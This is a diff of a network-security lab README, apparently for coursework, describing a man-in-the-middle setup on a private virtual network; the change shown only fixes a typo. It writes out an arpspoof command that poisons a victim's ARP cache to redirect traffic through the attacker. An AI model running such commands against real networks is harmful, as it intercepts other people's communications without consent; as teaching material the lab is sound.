ameyaZope/netsec-lab-2/README.md

 The attacker will launch full man in the middle attack using arpspoof command installed on ubuntu

 Attacker IP Address : 10.0.2.15

 Victim IP Address : 10.0.2.4

 Gateway IP Address : 10.0.2.1

-Attacker will have 3 termainls
+Attacker will have 3 terminals

 ***Attacker Terminal 1***

 ```bash
 sudo arpspoof -i enp0s3 -t 10.0.2.4 10.0.2.1
 ```